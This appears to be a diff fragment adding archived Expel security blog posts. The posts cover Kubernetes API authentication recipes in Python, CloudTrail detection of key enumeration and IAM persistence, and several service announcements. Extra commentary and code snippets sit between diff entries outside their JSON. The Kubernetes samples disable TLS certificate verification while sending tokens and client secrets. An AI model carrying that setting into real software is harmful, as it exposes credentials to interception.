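    StartTime=datetime.now(timezone.utc) - timedelta(days=7),
)
for page in pages:
    for event in page["Events"]:
        record = json.loads(event["CloudTrailEvent"])
        source_ip = record.get("sourceIPAddress", "unknown")
        access_key = record.get("userIdentity", {}).get("accessKeyId")
        if access_key:
            keys_by_ip[source_ip].add(access_key)

# One source IP enumerating with several different access keys is the behavior described above
for source_ip, keys in sorted(keys_by_ip.items()):
    if len(keys) > 1:
        print(f"{source_ip}: GetCallerIdentity with {len(keys)} access keys -> {sorted(keys)}")

Deactivating a confirmed bad key afterwards is a single IAM call (update_access_key with the status set to Inactive), which lines up with the remediation steps listed above.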
+} \ No newline at end of file diff --git a/instrumenting-the-big-three-managed-kubernetes.json b/instrumenting-the-big-three-managed-kubernetes.json new file mode 100644 index 0000000000000000000000000000000000000000..189e798d8337b918d6fa3eabba28eda9b00c7340 --- /dev/null +++ b/instrumenting-the-big-three-managed-kubernetes.json @@ -0,0 +1,6 @@ +{ + "title": "Instrumenting the \u201cbig three\u201d managed Kubernetes ...", + "url": "https://expel.com/blog/instrumenting-the-big-three-managed-kubernetes-offerings-with-python/", + "date": "Apr 13, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Instrumenting the \u201cbig three\u201d managed Kubernetes offerings with Python Engineering \u00b7 8 MIN READ \u00b7 DAN WHALEN \u00b7 APR 13, 2023 \u00b7 TAGS: Tech tools We\u2019ve written a lot about Kubernetes (k8s) in recent months, particularly on the need for improved security visibility . And we recently released a (first-to-market!) MDR for Kubernetes offering . Part of this journey involved overcoming a key technical challenge: what\u2019s the best way to securely access the Kubernetes API for managed offerings like Google Kubernetes Engine (GKE), Amazon Elastic Kubernetes Service (EKS), and Azure Kubernetes Service (AKS)? Each cloud provider has its own middleware, best practices, and hurdles to clear. Figuring it all out can be quite the challenge\u2014you can end up neck-deep in documentation, some of which is outdated or inaccurate. In this post, we\u2019ll share what we\u2019ve learned along the way and give you the tools you need to do it yourself. Why do this? This is an oversimplification, but Kubernetes is really just one big, robust, well-conceived API. It allows orchestration of workloads, but can also be employed to understand what\u2019s going on in the environment. You\u2019ve probably used (or heard of) kubectl, right? It\u2019s an incredibly useful tool, a client that interfaces with k8s APIs. If you can do it in kubectl, you could also go directly to the API to get the same information (and more). Using Kubernetes APIs opens up a plethora of use cases from automating inventory of resources, reliability monitoring, security policy checks, and even automating some detection and response activities. But to perform any of these activities you need to securely authenticate to your managed k8s provider. In the following sections, we\u2019ll walk you through how to do that securely for Google Cloud Platform (GCP), Microsoft Azure, and Amazon Web Services (AWS). If that sounds interesting, let\u2019s get started. Before you begin Before we get into the tech details, it\u2019s important to call out a few requirements. Requirements Follow security best practices Use established patterns for each cloud provider Use existing vendor packages where possible (don\u2019t reinvent the wheel) Note We\u2019re going to focus specifically on accessing the Kubernetes API for EKS, GKE, and AKS. We\u2019re not going to cover getting network access to the Kubernetes API\u2014there are too many permutations to cover, so we\u2019ll assume you have network connectivity, whether it\u2019s to a private cluster or a cluster with a public endpoint ( maybe don\u2019t do that, though ). Warning The Python recipes we\u2019re sharing below are just examples. Use them for inspiration\u2014 don\u2019t copy and paste them into production . 
What we\u2019re solving for Given cloud identity and access management (IAM) credentials for GCP, Azure, and AWS, and network connectivity to a Kubernetes cluster, how can we connect to the API in a way that satisfies all of our requirements? Each cloud infrastructure provider has its own managed Kubernetes offering and access patterns have some slight differences. At a high level, what we want to accomplish looks something like this: Early on we made a key design choice: we\u2019d strongly prefer to only deal with cloud IAM credentials. Sure, technically we could create service account tokens in Kubernetes natively and use them to access the API, but this feels wrong for a few reasons: Cutting service account tokens encourages long-lived credentials as a dark pattern, and we\u2019d like to avoid this for security reasons. Using k8s service accounts means rules-based access control (RBAC) authorization must be managed entirely in Kubernetes with roles and role bindings . We\u2019d like to avoid that wherever possible as it\u2019s not very accessible, is easy to misconfigure, and can be tough to audit. Managed k8s services have built-in authorization middleware we can use. Given that design, let\u2019s take a look at the recipes for GKE, AKS, and EKS. Connecting to Google Kubernetes Engine (GKE) How it works The recipe below uses a service account in GCP with a custom IAM role to access the Kubernetes API. In our view, Google has done a great job of making this simple and easy. The recipe takes advantage of existing Google SDKs to talk to the GCP control plane to get cluster details and an OAuth token for API access. Prerequisites A GCP service account (not a Kubernetes service account) with generated JSON credentials Service account must be assigned IAM permissions to get cluster details and read data in Kubernetes (this can be adjusted based on your use case) Network access to your cluster\u2019s API endpoint Python example import logging import google.auth.transport.requests from google.cloud.container_v1 import ClusterManagerClient from google.cloud.container_v1 import GetClusterRequest from google.oauth2 import service_account import kubernetes.client # Update this to your cluster ID CLUSTER_ID = \u201cprojects/kubernetes-integration-318317/locations/us-east1-b/clusters/gke-integration-test\u201d # Update this to your service account credentials file GOOGLE_CREDENTIALS = \u2018google_credentials.json\u2019 logging.info( \u201cRetrieving cluster details\u201d , cluster_id=CLUSTER_ID) credentials = service_account.Credentials.from_service_account_file(GOOGLE_CREDENTIALS) req = GetClusterRequest(name=CLUSTER_ID) cluster_manager_client = ClusterManagerClient(credentials=credentials) cluster = cluster_manager_client.get_cluster(req) logging.info( \u201cGot cluster endpoint address\u201d , endpoint=cluster.endpoint) logging.info( \u201cRequesting an OAuth token from GCP\u2026\u201d ) kubeconfig_creds = credentials.with_scopes( [ \u2018https://www.googleapis.com/auth/cloud-platform\u2019 , \u2018https://www.googleapis.com/auth/userinfo.email\u2019 , ] , ) auth_req = google.auth.transport.requests.Request() kubeconfig_creds.refresh(auth_req) logging.info( \u2018Retrieved OAuth token for K8s API\u2019 ) # Build endpoint string and token for K8s client api_endpoint = f\u2019https://{cluster.endpoint}: 443 \u2018 api_token = kubeconfig_creds.token logging.info( \u201cBuilding K8s API client\u201d ) configuration = kubernetes.client.Configuration() configuration.api_key[ \u2018authorization\u2019 
] = api_token configuration.api_key_prefix[ \u2018authorization\u2019 ] = \u2018Bearer\u2019 configuration.host = api_endpoint configuration.verify_ssl = False k8s_client = kubernetes.client.ApiClient(configuration=configuration) # Use K8s client to talk to Kubernetes API logging.info( \u201cListing nodes in this Kubernetes cluster\u201d ) core_v1 = kubernetes.client.CoreV1Api(api_client=k8s_client) print ( \u201cRetrieved Nodes:\\n\u201d , core_v1.list_node()) Connecting to Azure Kubernetes Service (AKS) How it works The recipe below uses an Azure application registration and a custom Azure role. Like Google, Microsoft put some thought into the linkages between Azure IAM and AKS. However, they\u2019ve gone through multiple support iterations and offer several ways to do authentication and authorization for AKS . This can be confusing, and takes a lot of reading to figure out. Luckily, we\u2019ve done all of that for you and can summarize. There are three ways to configure authN and authZ for AKS: Legacy auth with client certificates: Kubernetes handles authentication and authorization. Azure AD integration: Azure handles authentication, Kubernetes handles authorization. Azure RBAC for Kubernetes authorization: Azure handles authentication and authorization. We examined these options and recommend #3 for a few reasons: Your authentication and authorization policies will exist in one place (Azure IAM). Azure IAM RBAC is more user-friendly than in-cluster RBAC configurations. Azure roles are easier to audit than in-cluster rules. Based on these advantages, our Python recipe below authenticates with Azure, retrieves cluster details, and then requests an authentication token to communicate with the Kubernetes API. Prerequisites An Azure AD application registration Application must be assigned IAM permissions to get cluster details and read data in Kubernetes (this can be adjusted based on your use case) Network access to your cluster\u2019s API endpoint Python example import requests import logging import kubernetes.client # Update these to auth as your Azure AD App TENANT_ID = \u2018YOUR_TENANT_ID\u2019 CLIENT_ID = \u2018YOUR_CLIENT_ID\u2019 CLIENT_SECRET = \u2018YOUR_CLIENT_SECRET\u2019 # Update these to specify the cluster to connect to SUBSCRIPTION_ID = \u2018YOUR_SUBSCRIPTION_ID\u2019 RESOURCE_GROUP = \u2018YOUR_RESOURCE_GROUP\u2019 CLUSTER_NAME = \u2018YOUR_CLUSTER_NAME\u2019 def get_oauth_token(resource): \u201d\u2019 Retrieve an OAuth token for the provided resource \u201d\u2019 login_url = \u201chttps://login.microsoftonline.com/%s/oauth2/token\u201d % TENANT_ID payload = { \u2018grant_type\u2019 : \u2018client_credentials\u2019 , \u2018client_id\u2019 : CLIENT_ID, \u2018client_secret\u2019 : CLIENT_SECRET, \u2018Content-Type\u2019 : \u2018x-www-form-urlencoded\u2019 , \u2018resource\u2019 : resource } response = requests.post(login_url, data=payload, verify=False).json() logging.info( \u2018Got OAuth token for AKS\u2019 ) return response[ \u201caccess_token\u201d ] logging.info( \u201cRetrieving cluster endpoint\u2026\u201d ) token = get_oauth_token( \u2018https://management.azure.com\u2019 ) mgmt_url = \u201chttps://management.azure.com/subscriptions/%s\u201d % SUBSCRIPTION_ID mgmt_url += \u201c/resourceGroups/%s\u201d % RESOURCE_GROUP mgmt_url += \u201c/providers/Microsoft.ContainerService/managedClusters/%s\u201d % CLUSTER_NAME cluster = requests.get(mgmt_url, params={ \u2018api-version\u2019 : \u20182022-11-01\u2019 }, headers={ \u2018Authorization\u2019 : \u2018Bearer %s\u2019 % 
token} ).json() props = cluster[ \u2018properties\u2019 ] fqdn = props.get( \u2018fqdn\u2019 ) or props.get( \u2018privateFQDN\u2019 ) api_endpoint = \u2018https://%s:443\u2019 % fqdn logging.info( \u201cGot cluster endpoint\u201d , endpoint=api_endpoint) logging.info( \u201cRequesting OAuth token for AKS\u2026\u201d ) # magic resource ID that works for all AKS clusters AKS_RESOURCE_ID = \u20186dae42f8-4368-4678-94ff-3960e28e3630\u2019 api_token = get_oauth_token(AKS_RESOURCE_ID) logging.info( \u201cBuilding K8s API client\u201d ) configuration = kubernetes.client.Configuration() configuration.api_key[ \u2018authorization\u2019 ] = api_token configuration.api_key_prefix[ \u2018authorization\u2019 ] = \u2018Bearer\u2019 configuration.host = api_endpoint configuration.verify_ssl = False k8s_client = kubernetes.client.ApiClient(configuration=configuration) # Use K8s client to talk to Kubernetes API logging.info( \u201cListing nodes in this Kubernetes cluster\u201d ) core_v1 = kubernetes.client.CoreV1Api(api_client=k8s_client) print ( \u201cRetrieved Nodes:\\n\u201d , core_v1.list_node()) Connecting to Amazon Elastic Kubernetes Service (EKS) How it works AWS clearly thought about the linkages for its cloud IAM service, but hasn\u2019t built as robust an integration as Google or Microsoft. The end result is less than ideal. As much as we\u2019d love to be able to keep authN and authZ management in AWS IAM, we currently don\u2019t have that ability without installing additional third-party tools like kiam (although these tools are quickly becoming obsolete ). For this recipe, we\u2019ll focus on what\u2019s possible with native EKS clusters and leave additional third-party tooling as an exercise for you, dear reader. The recipe below uses an AWS IAM role to generate a token for EKS, which is an unusual (and not well-documented) process compared to GKE and AKS. To generate a token, we call the STS service to generate a pre-signed URL. This returns a signature which EKS accepts as a token identifying the calling user. This token authenticates the user, but requires that we rely on in-cluster RBAC policies for authZ. 
Prerequisites IAM role with attached policies allowing access to get cluster details and contact the API IAM assumes role credentials are exported as environment variables AWS-auth configmap is updated to grant access to IAM role In-cluster RBAC roles and RoleBindings grant privileges to cluster resources Python example import base64 import boto3 import logging import kubernetes.client AWS_REGION = \u2018YOUR_AWS_REGION\u2019 CLUSTER_NAME = \u2018YOUR_CLUSTER_NAME\u2019 class TokenGenerator( object ): \u201d\u2019 Helper class to generate EKS tokens \u201d\u2019 def __init__(self, sts_client, cluster_name): self._sts_client = sts_client self._cluster_name = cluster_name self._register_cluster_name_handlers() def _register_cluster_name_handlers(self): self._sts_client.meta.events.register( \u2018provide-client-params.sts.GetCallerIdentity\u2019 , self._retrieve_cluster_name, ) self._sts_client.meta.events.register( \u2018before-sign.sts.GetCallerIdentity\u2019 , self._inject_cluster_name_header, ) def _retrieve_cluster_name(self, params, context, **kwargs): if \u2018ClusterName\u2019 in params: context[ \u2018eks_cluster\u2019 ] = params.pop( \u2018ClusterName\u2019 ) def _inject_cluster_name_header(self, request, **kwargs): if \u2018eks_cluster\u2019 in request.context: request.headers[ \u2018x-k8s-aws-id\u2019 ] = request.context[ \u2018eks_cluster\u2019 ] def get_token(self): \u201c\u201d\u201dGenerate a presigned url token to pass to kubectl.\u201d\u201d\u201d url = self._get_presigned_url() token = \u2018k8s-aws-v1.\u2019 + base64.urlsafe_b64encode( url.encode( \u2018utf-8\u2019 ), ).decode( \u2018utf-8\u2019 ).rstrip( \u2018=\u2019 ) return token def _get_presigned_url(self): return self._sts_client.generate_presigned_url( \u2018get_caller_identity\u2019 , Params={ \u2018ClusterName\u2019 : self._cluster_name}, ExpiresIn=60, HttpMethod= \u2018GET\u2019 , ) logging.info( \u201cRetrieving cluster endpoint\u2026\u201d ) eks_client = boto3.client( \u2018eks\u2019 , AWS_REGION) resp = eks_client.describe_cluster(name=CLUSTER_NAME) api_endpoint = resp[ \u2018cluster\u2019 ][ \u2018endpoint\u2019 ] logging.info( \u2018Got cluster endpoint\u2019 , endpoint=api_endpoint) logging.info( \u201cRetrieving K8s Token\u2026\u201d ) sts_client = boto3.client( \u2018sts\u2019, AWS_REGION) api_token = TokenGenerator(sts_client, CLUSTER_NAME).get_token() logging.debug( \u2018Got cluster token\u2019 ) logging.info( \u201cBuilding K8s API client\u201d ) configuration = kubernetes.client.Configuration() configuration.api_key[ \u2018authorization\u2019 ] = api_token configuration.api_key_prefix[ \u2018authorization\u2019 ] = \u2018Bearer\u2019 configuration.host = api_endpoint configuration.verify_ssl = False k8s_client = kubernetes.client.ApiClient(configuration=configuration) # Use K8s client to talk to Kubernetes API logging.info( \u201cListing nodes in this Kubernetes cluster\u201d ) core_v1 = kubernetes.client.CoreV1Api(api_client=k8s_client) print ( \u201cRetrieved Nodes:\\n\u201d , core_v1.list_node()) Conclusion Our Workbench platform runs on Kubernetes. We\u2019ve been building on k8s for many years now and are excited to help organizations secure it. Kubernetes can be a bit intimidating, especially if you haven\u2019t had hands-on experience. We hope by sharing our insight we can advance the state of Kubernetes security more generally and get security teams more involved. 
We can\u2019t wait to see what people build\u2026" +} \ No newline at end of file diff --git a/introducing-24x7-monitoring-and-response-for-google.json b/introducing-24x7-monitoring-and-response-for-google.json new file mode 100644 index 0000000000000000000000000000000000000000..28b92ea6e05c5d6f732f75b5daa13e89d0953ead --- /dev/null +++ b/introducing-24x7-monitoring-and-response-for-google.json @@ -0,0 +1,6 @@ +{ + "title": "Introducing 24x7 monitoring and response for Google ...", + "url": "https://expel.com/blog/24-7-monitoring-response-google-cloud-platform/", + "date": "Jun 23, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Introducing 24\u00d77 monitoring and response for Google Cloud Platform Expel insider \u00b7 1 MIN READ \u00b7 PETER SILBERMAN \u00b7 JUN 23, 2020 \u00b7 TAGS: Announcement / Managed detection and response / Selecting tech / Tools If you run any workloads on Google Cloud Platform (GCP), I\u2019ll bet you can identify with one of these scenarios: You\u2019ve got a multi-cloud strategy and recently migrated some data and workflows to GCP. Now it\u2019s time to get serious about securing it. You use GCP but don\u2019t have a big enough team (or the right tech in place) to make sense of the regular barrage of GCP alerts and confusing river of logs. You\u2019re playing catch up because your dev team is running a couple workflows on GCP that you recently learned about and now it\u2019s time to secure them. That\u2019s why I\u2019m excited to tell you that today we\u2019re officially launching 24\u00d77 monitoring and response services for GCP . We now provide security support for three of the major cloud service providers (CSPs): Amazon Web Services (AWS) , Microsoft Azure and GCP . We\u2019ve heard from our customers time and time again that they need a security partner that understands the nuances of each CSP and is willing to work with the customer\u2019s cloud strategy and the security services they already have. Whether that involves a single CSP, multiple CSPs or a hybrid approach, they need one place to go to help sort through multiple environments, third-party integrations and logs with weak signals. That\u2019s where we come in. Expel monitoring and response for GCP: How it works Expel secures your GCP environment with 24\u00d77 monitoring and response. Expel integrates with both Google\u2019s Security Command Center and Operations (formerly StackDriver). Expel turns logs that represent suspicious/potentially interesting activity into alerts for our analysts to look at. Our Detection and Response engineering team spent the past six months researching various ways attackers can gain access, escalate privileges and steal data. We also have the benefit of talking to customers, learning about the risks they perceive and applying the lessons we\u2019ve learned from monitoring Azure and AWS. Our research, customer conversations and experience with other CSPs all come together to form our approach to monitoring GCP. Need better cloud security? Let\u2019s chat. Whether you\u2019re running workloads on a few cloud platforms or just testing the waters with one, this page on our website sheds more light on the cloud platforms we support, along with what we monitor and how we do it. Want to learn more or talk to a real person? Send us a note." 
+} \ No newline at end of file diff --git a/introducing-a-mind-map-for-aws-investigations.json b/introducing-a-mind-map-for-aws-investigations.json new file mode 100644 index 0000000000000000000000000000000000000000..08294327039432cec05e8e7fe058198fbead078d --- /dev/null +++ b/introducing-a-mind-map-for-aws-investigations.json @@ -0,0 +1,6 @@ +{ + "title": "Introducing a mind map for AWS investigations", + "url": "https://expel.com/blog/mind-map-for-aws-investigations/", + "date": "Nov 17, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Introducing a mind map for AWS investigations Security operations \u00b7 2 MIN READ \u00b7 DAVID BLANTON \u00b7 NOV 17, 2020 \u00b7 TAGS: Cloud security / MDR Our SOC team remediates quite a few incidents in Amazon Web Services (AWS). Some of these were surprise attacks from red teams, while others were live attackers in our customers\u2019 cloud environments. When running these incidents down, some common themes emerged about when and why attackers use different AWS APIs \u2013 and they mapped nicely to the MITRE ATT&CK tactics. We noticed that these notes were really helpful when our analysts were investigating CloudTrail logs. So we captured these AWS APIs in a mind map and loaded it into our Expel Workbench. This mind map is a TL;DR of the attack paths an attacker may take once they gain access to an AWS environment. Why do we think you\u2019ll find it useful? First, it can help analysts see the bigger picture during investigations, so they can quickly identify risk and possible compromise. Full disclosure, the AWS mind map doesn\u2019t cover every API call and the associated ATT&CK tactic. But it can be a resource during incident response and, after remediation, can help you tell the story of what happened to the rest of your team or your customer. For example, let\u2019s say you find yourself responding to a GuardDuty alert for compromised EC2 credentials. While reviewing successful AWS API calls from the external source IP address and Amazon Resource Name (ARN), you spot API calls for CreateUser followed by PutUserPolicy and AttachUserPolicy after a series of Get*, Describe* and List* calls. If this were unauthorized activity, the mind map can help piece together that this may indicate automated reconnaissance in which an attacker created a privileged user to establish persistence in your environment. We\u2019ve also used the mind map to summarize red team engagements after we\u2019ve chased them in a customer\u2019s environment. We told the story of the engagement by filling in a blank mind map with what APIs the red team used during their engagement. And these are just some examples of how the Expel AWS mind map has already been incredibly useful to us. We hope this resource will be helpful to you if you ever find yourself chasing a bad guy through the cloud. In addition to the mind map, we\u2019ve created a cheat sheet for how to use and get the most out of the mind map, along with a blank mind map that you can use during your investigations. Click here to get our AWS mind map kit sent directly to your email inbox!" 
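If you want to turn that CreateUser / PutUserPolicy / AttachUserPolicy example into a quick CloudTrail sweep, here's a rough sketch with boto3. As with any LookupEvents-based check, it only sees management events from roughly the last 90 days, and the field names follow standard CloudTrail records:

import json
from collections import defaultdict

import boto3

PERSISTENCE_CALLS = ["CreateUser", "PutUserPolicy", "AttachUserPolicy"]

cloudtrail = boto3.client("cloudtrail")
calls_by_actor = defaultdict(list)

paginator = cloudtrail.get_paginator("lookup_events")
for event_name in PERSISTENCE_CALLS:
    for page in paginator.paginate(
        LookupAttributes=[{"AttributeKey": "EventName", "AttributeValue": event_name}]
    ):
        for event in page["Events"]:
            record = json.loads(event["CloudTrailEvent"])
            actor = record.get("userIdentity", {}).get("arn", "unknown")
            calls_by_actor[actor].append(
                (record.get("eventTime"), record.get("eventName"), record.get("sourceIPAddress"))
            )

# An ARN that performed the whole sequence deserves a closer look on the mind map
for actor, calls in calls_by_actor.items():
    if {name for _, name, _ in calls} >= set(PERSISTENCE_CALLS):
        print(actor)
        for when, name, source_ip in sorted(calls, key=lambda c: c[0] or ""):
            print("   ", when, name, "from", source_ip)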
+} \ No newline at end of file diff --git a/introducing-expel-for-phishing.json b/introducing-expel-for-phishing.json new file mode 100644 index 0000000000000000000000000000000000000000..e9b4b47577e32177b6307e084bb0c5dd7797784c --- /dev/null +++ b/introducing-expel-for-phishing.json @@ -0,0 +1,6 @@ +{ + "title": "Introducing Expel for phishing", + "url": "https://expel.com/blog/introducing-expel-for-phishing/", + "date": "Oct 13, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Introducing Expel for phishing Expel insider \u00b7 2 MIN READ \u00b7 PETER SILBERMAN \u00b7 OCT 13, 2020 \u00b7 TAGS: Company news / MDR If you\u2019ve worked in cybersecurity for a hot second, then you know crafty attackers are always busy dreaming up new ways to compromise your org \u2013 whether it\u2019s through your AWS environment or man-in-the-middle-ing your CEO\u2019s credentials. Yet one of the oldest (and still effective) tricks in the book for getting inside an org is through its employees\u2019 inboxes. Yep, we\u2019re talking about phishing. Chances are, you\u2019ve invested time to train your employees to have a keen eye for suspicious emails. If you\u2019ve been successful, they\u2019re slamming that phish button every time a malicious email lands in their inbox. And your phishing simulations are seeing good success rates. Huzzah! And now your team needs to review and investigate every single one of those emails that are reported. *Record scratch* It\u2019s time consuming, tedious and it\u2019s keeping your talented analysts from focusing on the more strategic security work you hired them to do. Finding ways to triage an abundance of phishing emails while still keeping your analysts happy and engaged isn\u2019t an easy task. In fact, we hear it all the time from our customers that it\u2019s something they struggle with. Which is exactly why we created Expel for Phishing. How Expel\u2019s managed phishing service works There are plenty of products out there to help triage phishing emails. So what makes us different? While other phishing products also surface emails they believe to be phishing, they typically stop there. But Expel takes it a step further. Our analysts have eyes on every email that is either directly forwarded to us or is delivered through a \u201creport phishing\u201d button. From there, we determine if the email is indeed a legitimate phishing attempt. And then Expel for Phishing keeps going. When we find an email that\u2019s a phishing attack, we use your endpoint detection and response (EDR) tool to see what the user did, if they\u2019re compromised and if anyone else clicked on the email. From there, we provide you with a detailed report that includes remediation recommendations \u2013 including exactly which employees clicked on the malicious email and what you need to do to shut those attackers down. If you\u2019re more of a visual learner, here\u2019s a peek at the process we just described: Expel managed phishing process Like any other services from Expel, our analysts keep you in the loop throughout the investigation and remediation processes through a dedicated Slack channel and the Expel Workbench. Drowning in phishing emails? Let us throw you a line. We\u2019re excited to help orgs of all shapes and sizes manage their phishing emails, letting their security teams get back to focusing on the security work they love. If you\u2019d like to find out more, check out our Expel for phishing page ." 
+} \ No newline at end of file diff --git a/introducing-expel-vulnerability-prioritization-our-new.json b/introducing-expel-vulnerability-prioritization-our-new.json new file mode 100644 index 0000000000000000000000000000000000000000..16cfa0a50345a1dc821cf6d951a18b4b0cc500d3 --- /dev/null +++ b/introducing-expel-vulnerability-prioritization-our-new.json @@ -0,0 +1,6 @@ +{ + "title": "Introducing Expel Vulnerability Prioritization: our new ...", + "url": "https://expel.com/blog/introducing-expel-vulnerability-prioritization-our-new-solution-for-helping-identify-the-highest-risk-vulnerabilities/", + "date": "Apr 20, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Introducing Expel Vulnerability Prioritization: our new solution for helping identify the highest-risk vulnerabilities Security operations \u00b7 3 MIN READ \u00b7 MATT PETERS \u00b7 APR 20, 2023 \u00b7 TAGS: MDR In ancient Greece there was a monster called a Lernean Hydra. It had nine heads and, if you cut one off, two more grew in its place. Between that, Sisyphus endlessly rolling a rock up a hill, and Prometheus chained to a rock perpetually being eaten by vultures, the ancient Greeks sure had a deep bench of unending torments. Fast forward to today. In 2014, NIST had to add a digit to the CVE format because the number of vulnerabilities discovered in a calendar year could no longer be counted with 4 digits. The number has only grown\u2013there were over 26 thousand vulnerabilities reported in 2022! But we can\u2019t just put our heads in the sand. According to a recent Forrester report , software vulnerabilities are the second-most reported attack vector. There has got to be something we can do. Figuring out which vulnerabilities matter most is important, but hugely difficult. Static methods like the Common Vulnerability Scoring System (CVSS) don\u2019t solve the whole problem because they don\u2019t take into account dynamic factors impacting the likelihood of exploit\u2013things like \u201cis there a public version?\u201d and \u201cdo we have a compensating control?\u201d are all things you may need to consider. Even if you do something like \u201cjust patch the criticals,\u201d the problem is still intractably huge\u2013 those increased by 59% in 2022 . You may also be challenged because your team may not fully own the vulnerability management process. Other stakeholders may include risk management, IT operations, or line of business\u2013and there may be multiple teams within IT based on who \u201cowns\u201d the technology where the vulnerabilities exist. Because multiple teams share the vulnerability remediation process, it\u2019s often difficult to coordinate the metrics and tracking of fixes. In some cases, organizations might not even get better security outcomes. For example, some organizations have goals around remediating a specific number or percentage of vulnerabilities, without qualifying whether those vulnerabilities pose an actual threat to the business. Here we find ourselves\u2013fighting a monster or chained to a rock\u2013pick your favorite ancient Greek torment. We have to do something and, as a first step, we want to figure out how to prioritize better. That\u2019s why we\u2019re now offering Expel Vulnerability Prioritization , our newest managed service that takes the burden off security teams by doing the triage and investigation of unresolved security issues for them\u2013to identify the vulnerabilities that are putting customers at the highest level of risk. 
If you\u2019re using a Tenable or Rapid7 vulnerability management solution, then Expel Vulnerability Prioritization is for you. We take these solutions a step further, accelerating your remediation process by letting you know exactly which vulnerabilities detected pose the greatest risk. By connecting the dots between your Tenable or Rapid7 on-prem vulnerability data, and priority assets in your Expel Managed Detection and Response (MDR) environment, we assess your risk and the potential impact of your vulnerabilities against external threat intel and what attackers are actually exploiting in the wild. You get a prioritized list of vulnerabilities with recommendations on next steps for immediate action. This reduces the burden on your SecOps and IT teams with: Risk-based prioritization, by matching internal context for the risk with the degree of exploitability A dedicated team to investigate and provide guidance A clear assessment and prompt reporting of criticality and potential impact if the issue stays unresolved Expel Vulnerability Prioritization employs a risk-based prioritization model that starts with ingesting endpoint vulnerability scanner data from Tenable.io Vulnerability Management and Rapid7\u2019s InsightVM. We then match that data to external threat intelligence, and what our SOC is seeing across our MDR customers\u2019 environments to get more context and narrow down the list of vulnerabilities most likely to impact your organization. Like all Expel products, we use a software-first approach, ingesting information from your existing security devices and technology, and applying our own automations (or bots) to investigate and triage. Then our Vulnerability Analysts further investigate and analyze to qualify what vulnerabilities are urgent, and what\u2019s recommended for remediation during the next patching cycle. Our team then notifies you about urgent and recommended vulnerabilities with remediation guidance. Here\u2019s another look at our risk-based prioritization model: Expel Vulnerability Prioritization aims to accelerate your prioritization and remediation process so you can improve visibility and decision-making, spend less time triaging and investigating vulnerabilities, and more time patching. It can also strengthen your detection and response processes by shutting down attack vectors that could be exploited. Expel Vulnerability Prioritization is another solution powered by our security operations platform, Expel Workbench \u2122, complementing our market-leading MDR, phishing, and threat hunting offerings. We enable you to take a proactive approach to investigation and remediation, and eliminate critical risks early in the cybersecurity kill chain. If you\u2019re attending the RSA Conference in San Francisco next week, feel free to stop by for a demo at booth #954 in the South Hall. If you\u2019re not going to RSA, feel free to contact us for more details." 
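As a toy illustration of that risk-based idea (emphatically not Expel's actual model), you can get surprisingly far by weighting scanner severity with known-exploited intel, such as CISA's KEV catalog, and the importance of the asset the finding sits on. Every field, weight, and the second CVE ID below are made up for illustration:

# Toy scoring only: fields, weights, and the second CVE ID are invented for this example
findings = [
    {"cve": "CVE-2021-44228", "cvss": 10.0, "asset": "payroll-web-01", "asset_priority": "high"},
    {"cve": "CVE-2022-12345", "cvss": 9.1, "asset": "dev-sandbox-07", "asset_priority": "low"},
]
known_exploited = {"CVE-2021-44228"}            # e.g. seeded from the CISA KEV catalog
asset_weight = {"high": 2.0, "medium": 1.0, "low": 0.5}

def risk_score(finding):
    score = finding["cvss"]
    if finding["cve"] in known_exploited:
        score *= 2                              # actively exploited beats theoretical severity
    return score * asset_weight[finding["asset_priority"]]

for finding in sorted(findings, key=risk_score, reverse=True):
    print(round(risk_score(finding), 1), finding["cve"], "on", finding["asset"])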
+} \ No newline at end of file diff --git a/introducing-expel-workbenchtm-for-amazon-web-services.json b/introducing-expel-workbenchtm-for-amazon-web-services.json new file mode 100644 index 0000000000000000000000000000000000000000..bb823439af0c19fb9baa7e4680d8eae25d5cab49 --- /dev/null +++ b/introducing-expel-workbenchtm-for-amazon-web-services.json @@ -0,0 +1,6 @@ +{ + "title": "Introducing Expel Workbench\u2122 for Amazon Web Services ...", + "url": "https://expel.com/blog/expel-workbench-for-amazon-web-services/", + "date": "Feb 1, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Introducing Expel Workbench\u2122 for Amazon Web Services (AWS) Expel insider \u00b7 3 MIN READ \u00b7 PETER SILBERMAN \u00b7 FEB 1, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools If you\u2019re a growing company that was \u201cborn in the cloud\u201d, revenue, uptime, new features and innovation are likely some of the big priorities driving your org. If you had time (and a little forethought) while you were busy building you might\u2019ve baked some security into your CI/CD pipeline. But monitoring security alerts for your application that\u2019s running in AWS isn\u2019t exactly at the top of your to-do list \u2026 until one of your big customers (or lawyers or auditors) start asking pointed questions about how you\u2019re monitoring and securing their data in AWS. Sound familiar? At this point, most of the customers we work with started asking themselves a few questions: How do I detangle this confusing (and ever-changing) array of AWS services, CloudTrail logs and alerts? Where can I find someone (or the budget to hire someone) who can sift through AWS security alerts and tell me which ones are real risks? What\u2019s the \u201cplaybook\u201d for investigating and fixing AWS security alerts? Then they set out in search of a product to help \u2026 and waded through miles of marketing fluff and ended up more than a little irked. An \u201ceasy\u201d button for AWS security The scenario (and frustration) I describe above \u2013 which we\u2019ve heard from orgs in all sorts of industries \u2013 is what inspired us to create Expel Workbench\u2122 for AWS. We think of it as an \u201ceasy\u201d button to monitor and investigate potential security risks in your AWS environment. It takes all of your AWS logs and alerts and tells you which ones are real risks (and why all the others aren\u2019t). How it works: Expel Workbench only surfaces Expel-validated alerts. Our ability to validate alerts is based on the experience of our SOC analysts who\u2019ve run thousands of investigations in AWS environments. Expel Workbench also comes with our bot, Ruxie\u2122, who automatically investigates alerts and gathers additional information before surfacing them up to you, so you\u2019ve got data you need to make quick and accurate decisions. In addition to gotta-fix-that-now alerts like databases going public or compromised instance credentials, Expel Workbench also tells you when there are \u201cinteresting\u201d things like risky authentications or unusual IAM policy changes that may not be immediate risks but are probably something you want to know about. We don\u2019t just rely on AWS GuardDuty, we surface observations and correlations out of your CloudTrail Logs too . 
